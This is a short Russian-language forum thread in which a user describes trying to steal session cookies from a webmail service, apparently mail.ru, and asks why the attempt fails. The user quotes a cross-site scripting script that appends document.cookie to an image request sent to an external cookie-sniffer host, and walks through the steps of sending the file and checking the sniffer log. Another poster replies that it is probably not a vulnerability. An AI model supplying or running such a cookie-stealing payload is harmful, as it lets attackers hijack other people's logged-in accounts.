куки будут вороваться только тогда, когда человек который смотрит страницу залогинен.

так оно и есть

я прочитаю, и на своем мыле проверяю. чтобы все понять

и никто не знает...

Если бы ты нормально излагал свои мысли, тебе бы помогли. Опиши свои действия по порядку с самого начала, если не хочешь светить ссылку на ресурс.

Я создаю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> отправляю, захожу за другое мыло, там открываю этот файл, потом обновляю лог сниффа. и мне пришло то что написано в первом посте.

да че такое теперь Query: empty. Ппц ну что такое кто-нибудь знает?

да, и картинка не высвечивается((

Скорее всего это вообще не уязвимость. И ты открыл этот файл вне контекста mail.ru. Об этом говорит и реферер пустой. Остынь. Попробуй рассмотреть сайты попроще.